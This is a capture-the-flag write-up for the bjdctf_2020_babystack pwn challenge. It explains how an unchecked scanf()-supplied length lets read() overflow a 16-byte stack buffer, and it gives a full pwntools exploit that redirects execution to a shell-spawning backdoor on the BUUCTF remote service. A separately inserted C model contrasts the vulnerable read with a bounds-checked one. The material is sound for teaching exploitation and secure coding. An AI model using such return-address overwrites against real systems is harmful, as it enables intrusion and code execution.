bjdctf_2020_babystack
2022-06-24 07:23:00 [mzq]

checksec: a 64-bit binary with no stack canary and no PIE, so there is nothing to bypass. Open it in IDA.
main function
At first glance the read() call reads 0 bytes, i.e. nothing at all, and the scanf() cannot overflow either, so there seems to be no problem.
However, scanf() reads a number from the user and stores it in nbytes, and read() then reads nbytes bytes into the 16-byte name buffer, so we can overflow by any length we like.
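As an added example (not part of the original write-up or the challenge binary), here is a C model of the frame that the payload below targets, with the vulnerable read() shape next to a hardened one. The frame layout (16-byte buffer, saved rbp, return address) is inferred from the payload; the 0x400561 and 0x4006e6 addresses used in main() are placeholders, not values taken from the page.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Frame layout implied by the write-up's payload: a 16-byte name buffer,
 * the saved rbp, the return address, and the qword above it. */
struct frame {
    char name[16];
    uint64_t saved_rbp;
    uint64_t ret_addr;   /* first qword popped by main's ret */
    uint64_t after_ret;  /* second qword, popped by the ret gadget */
};

/* Backing store so the modelled overflow stays inside memory we own. */
union frame_model {
    struct frame f;
    char raw[256];
};

struct outcome {
    ssize_t n;           /* bytes read, or -1 if the length was rejected */
    uint64_t saved_rbp, ret_addr, after_ret;
};

/* Vulnerable shape: the length scanf() parsed goes straight into read(). */
ssize_t read_name_vuln(int fd, char *name, long nbytes) {
    return read(fd, name, (size_t)nbytes);
}

/* Hardened shape: refuse lengths that do not fit, keep a byte for the NUL. */
ssize_t read_name_safe(int fd, char *name, size_t name_sz, long nbytes) {
    if (nbytes < 0 || (size_t)nbytes >= name_sz)
        return -1;
    ssize_t n = read(fd, name, (size_t)nbytes);
    if (n >= 0)
        name[n] = '\0';
    return n;
}

/* Same bytes the exploit sends: 16 filler, 8 fake rbp, ret gadget, backdoor. */
size_t build_payload(char out[40], uint64_t ret_gadget, uint64_t backdoor) {
    memset(out, 'a', 16);
    memset(out + 16, 'b', 8);
    memcpy(out + 24, &ret_gadget, 8);   /* host is little-endian, like p64() */
    memcpy(out + 32, &backdoor, 8);
    return 40;
}

/* Push the constructed payload through a pipe so read() sees it as stdin would. */
static int feed(const char *payload, size_t len) {
    int fds[2];
    if (pipe(fds) != 0)
        return -1;
    if (write(fds[1], payload, len) != (ssize_t)len) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);
    return fds[0];
}

static struct outcome run(int safe, uint64_t ret_gadget, uint64_t backdoor, long nbytes) {
    union frame_model m;
    char payload[40];
    struct outcome o = { -1, 0, 0, 0 };
    memset(&m, 0, sizeof m);
    size_t len = build_payload(payload, ret_gadget, backdoor);
    int fd = feed(payload, len);
    if (fd < 0)
        return o;
    o.n = safe ? read_name_safe(fd, m.f.name, sizeof m.f.name, nbytes)
               : read_name_vuln(fd, m.f.name, nbytes);
    close(fd);
    o.saved_rbp = m.f.saved_rbp;
    o.ret_addr = m.f.ret_addr;
    o.after_ret = m.f.after_ret;
    return o;
}

struct outcome run_vuln(uint64_t ret_gadget, uint64_t backdoor, long nbytes) {
    return run(0, ret_gadget, backdoor, nbytes);
}

struct outcome run_safe(uint64_t ret_gadget, uint64_t backdoor, long nbytes) {
    return run(1, ret_gadget, backdoor, nbytes);
}

int main(void) {
    /* Placeholder addresses for the demo; the real exploit reads them from the ELF. */
    struct outcome v = run_vuln(0x400561, 0x4006e6, 100);
    struct outcome s = run_safe(0x400561, 0x4006e6, 100);
    printf("vuln: read %zd bytes, ret_addr=%#lx, next qword=%#lx\n",
           v.n, (unsigned long)v.ret_addr, (unsigned long)v.after_ret);
    printf("safe: read %zd (-1 = rejected), ret_addr=%#lx\n",
           s.n, (unsigned long)s.ret_addr);
    return 0;
}
```

With nbytes=100 the vulnerable reader accepts all 40 bytes: the saved rbp becomes the 'b' filler, the return address becomes the ret gadget, and the qword above it becomes the backdoor address, which is exactly the chain main's ret and the gadget's ret walk through. The hardened reader rejects any length that does not fit the 16-byte buffer before touching it.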
backdoor function
Jumping to this function gives us a shell.
exp
The ret gadget is there to keep the stack 16-byte aligned before system() runs; in fact returning to backdoor+1 instead (skipping the push rbp in its prologue, which shifts rsp by 8 bytes) works just as well.
from pwn import *

context(log_level="debug", arch="amd64", os="linux")
elf = ELF("./bjdctf_2020_babystack")

# Pick one target: the local binary or the BUUCTF remote instance
# io = process("./bjdctf_2020_babystack")
io = remote("node4.buuoj.cn", 29159)

backdoor = elf.symbols["backdoor"]  # no PIE, so the symbol is the runtime address
ret = 0x0000000000400561            # lone `ret` gadget to keep the stack 16-byte aligned
log.info(f"backdoor @ {backdoor:#x}")

# Tell scanf() the "length" is 100 so read() accepts far more than the 16-byte buffer
io.sendlineafter(b"Please input the length of your name:", b"100")

# 16 bytes of buffer + 8 bytes saved rbp, then the ret gadget, then backdoor
payload = flat([b"a" * 16, b"b" * 8, ret, backdoor])
io.sendlineafter(b"What's u name?", payload)
io.interactive()
